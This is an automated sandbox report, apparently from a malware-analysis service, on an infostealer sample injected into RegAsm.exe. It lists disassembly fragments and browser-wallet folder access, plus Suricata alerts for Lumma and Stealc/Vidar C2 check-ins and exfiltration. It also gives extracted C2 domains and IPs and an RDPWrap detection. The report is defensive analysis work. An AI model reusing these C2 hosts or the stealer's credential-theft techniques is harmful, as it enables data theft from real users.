Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000006.00000002.2096547544.000000002C6F4000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.6.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.6.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2462772884.0000000007FFB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2148470094.000000006FA8D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.6.dr
Source:	Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, rfxvmt.dll.30.dr, RDPWInst.exe.20.dr
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: CFHIIEHJKK.exe, 00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, CFHIIEHJKK.exe.6.dr, 66f5de72d9ebd_rdp[1].exe.6.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	6_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	6_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	6_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

6_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	6_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	6_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	16_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	16_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	16_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	16_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	16_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	16_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	16_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	16_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	16_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	16_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	16_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	16_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	16_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	16_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	16_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	16_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	16_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	16_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	16_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	16_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	16_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	16_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	16_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	16_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	16_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	16_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	16_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	16_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	16_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	16_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	16_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	16_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	16_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	16_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	16_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	16_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	16_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	16_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	16_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	16_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	16_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	16_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	16_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	16_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	16_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	16_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	16_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	16_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	16_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	16_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	16_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056176 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop) : 192.168.2.7:63092 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.7:55367 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.7:49736 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.7:49737 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.7:56659 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.7:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.7:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.7:60213 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.7:58425 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.7:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.7:49744 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.7:59642 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.7:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.7:57807 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.7:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.7:59109 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.7:49749 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49747 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.7:57781 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 147.45.44.104:80 -> 192.168.2.7:49734
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49714 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.7:49714
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.7:49715
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49736 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49736 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49749 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49737 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49737 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.7:49757
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49749 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.7:49758
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49744 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49744 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49751 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49751 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49746 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: wallkedsleeoi.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Yara detected RDPWrap Tool

Source: Yara match	File source: 30.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2111865526.0000000000450000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RDPWInst.exe PID: 1448, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.7:49764 -> 8.46.123.33:3389

